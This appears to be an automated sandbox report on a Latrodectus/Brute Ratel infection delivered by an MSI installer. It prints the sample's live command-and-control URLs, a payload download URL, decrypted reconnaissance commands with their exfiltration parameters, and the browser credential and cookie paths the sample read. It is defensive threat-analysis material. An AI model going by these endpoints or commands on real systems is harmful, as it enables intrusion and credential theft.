Source: WMIC.exe, 00000022.00000003.3203718696.00000168E3160000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3206787476.00000168E2A8B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3202974361.00000168E2A63000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3203050115.00000168E2A89000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3203737549.00000168E3161000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3206703908.00000168E2A6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected BruteRatel

Source: Yara match	File source: 00000005.00000002.4125925258.0000023CDAA1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2049513486.0000023CDAA4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7664, type: MEMORYSTR

Yara detected Latrodectus

Source: Yara match	File source: 00000009.00000002.4132374823.0000000009F9A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Contains functionality to steal Internet Explorer form passwords

Source: C:\Windows\explorer.exe

Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2

9_2_0B8D8848

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\Cookies	Jump to behavior

Remote Access Functionality

Yara detected BruteRatel

Source: Yara match	File source: 00000005.00000002.4125925258.0000023CDAA1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2049513486.0000023CDAA4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7664, type: MEMORYSTR

Yara detected Latrodectus

Source: Yara match	File source: 00000009.00000002.4132374823.0000000009F9A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.16.251	reateberam.com	United States	13335	CLOUDFLARENETUS	true
104.21.68.89	dogirafer.com	United States	13335	CLOUDFLARENETUS	true
103.57.249.207	huanvn.com	India	17747	SITINETWORS-IN-APSITINETWORKSLIMITEDIN	true

Contacted Domains

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.210.172	true
reateberam.com	104.21.16.251	true
huanvn.com	103.57.249.207	true
dogirafer.com	104.21.68.89	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reateberam.com/test/	true	Avira URL Cloud: malware	unknown
https://dogirafer.com/test/	true	Avira URL Cloud: safe	unknown
https://reateberam.com/files/stkm.bin	true	Avira URL Cloud: malware	unknown

AV Detection

Antivirus detection for URL or domain

Source: https://reateberam.com/=	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/5865723_17335797906044_2080493URLS1https://dogirafer.com/test/5205754_80	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/32.dll	Avira URL Cloud: Label: malware
Source: https://reateberam.com/	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/v	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/4782396_3336673150375_5876994URLS1https://dogirafer.com/test/7951999_661	Avira URL Cloud: Label: malware
Source: https://reateberam.com/files/stkm.binbm	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/1424693_495962074200_3017094URLS1https://dogirafer.com/test/3578852_8133	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/7765524_55360872352224_4448453URLS1https://dogirafer.com/test/604857_961	Avira URL Cloud: Label: malware
Source: https://reateberam.com/files/stkm.bin	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/3426159_38935932553563_5901982URLS1https://dogirafer.com/test/8447341_42	Avira URL Cloud: Label: malware

Found malware configuration

Source: 9.0.explorer.exe.1370000.0.raw.unpack

Malware Configuration Extractor: Latrodectus {"C2 url": ["https://reateberam.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c ipconfig /all
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c systeminfo
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c nltest /domain_trusts
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c net view /all
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c nltest /domain_trusts /all_trusts
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c net view /all /domain
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &ipconfig=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c net group "Domain Admins" /domain
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c net config workstation
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c whoami /groups
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &systeminfo=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &domain_trusts=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &domain_trusts_all=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &net_view_all_domain=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &net_view_all=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &net_group=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &wmic=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &net_config_ws=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &net_wmic_av=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &whoami_group=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "pid":
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "%d",
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "proc":
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "%s",
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "subproc": [
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &proclist=[
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "pid":
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "%d",
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "proc":
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "%s",
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "subproc": [
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &desklinks=[
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: .
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "%s"
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Update_%x
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Custom_update
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: .dll
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: .exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Error
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: runnung
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %s/%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: front
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /files/
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Lambda
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Cookie:
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: POST
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: GET
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: curl/7.88.1
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: CLEARURL
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: URLS
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: COMMAND
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: ERROR
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: DR2HpnCotlUgjMnaEE9p4nTXYS0dKcCqcD0K4aPi1LctrLPoDHUhq75vfji41aMg
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: [{"data":"
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "}]
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &dpost=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: https://reateberam.com/test/
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: https://dogirafer.com/test/
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: \*.dll
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: AppData
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Desktop
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Startup
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Personal
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Local AppData
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: <html>
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: <!DOCTYPE
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %s%d.dll
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Content-Length: 0
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Content-Type: application/dns-message
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Content-Type: application/ocsp-request
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: 12345
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: 12345
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &stiller=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %s%d.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %x%x
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &mac=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %02x
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: :%02x
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &computername=%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &domain=%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: LogonTrigger
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: \Registry\Machine\
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: TimeTrigger
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: PT0H%02dM
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: PT0S
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: \update_data.dat

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D5E5C StrStrIA,StrChrA,CryptUnprotectData,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LocalFree,GetProcessHeap,HeapFree,	9_2_0B8D5E5C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D5FE4 CryptUnprotectData,	9_2_0B8D5FE4
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D6078 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,BCryptGetProperty,BCryptGenerateSymmetricKey,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,BCryptDecrypt,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,BCryptCloseAlgorithmProvider,GetProcessHeap,HeapFree,	9_2_0B8D6078
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D453C lstrcpyA,lstrcatA,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,lstrcpyW,RegQueryValueExW,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey,	9_2_0B8D453C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D8568 lstrlenW,CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfA,lstrcatA,wsprintfA,lstrcatA,CryptDestroyHash,CryptReleaseContext,RegQueryValueExA,lstrlenW,CryptUnprotectData,LocalFree,	9_2_0B8D8568

Source: unknown	HTTPS traffic detected: 104.21.16.251:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.251:443 -> 192.168.2.4:49914 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49967 version: TLS 1.2

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI48D4.tmp, 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, MSI48D4.tmp, 00000003.00000000.1677749985.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, zdi.txt.msi, MSI48D4.tmp.1.dr, 424593.msi.1.dr, MSI4808.tmp.1.dr
Source:	Binary string: C:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\NvXDCore\x64\ReleaseWin7\bin\NvXDCore.pdb source: rundll32.exe, 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmp, wait.dll.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI48D4.tmp, 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, MSI48D4.tmp, 00000003.00000000.1677749985.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, zdi.txt.msi, MSI48D4.tmp.1.dr, 424593.msi.1.dr, MSI4808.tmp.1.dr

Spreading

Performs a network lookup / discovery via net view

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C4B02D FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00C4B02D
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA922E90 swprintf,swprintf,FindFirstFileW,GetLastError,swprintf,FindNextFileW,CompareFileTime,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,swprintf,swprintf,FindClose,	5_2_00007FFDFA922E90
Source: C:\Windows\explorer.exe	Code function: 9_2_0137A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,	9_2_0137A8E0
Source: C:\Windows\explorer.exe	Code function: 9_2_01372B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	9_2_01372B28
Source: C:\Windows\explorer.exe	Code function: 9_2_013804C0 FindFirstFileW,	9_2_013804C0
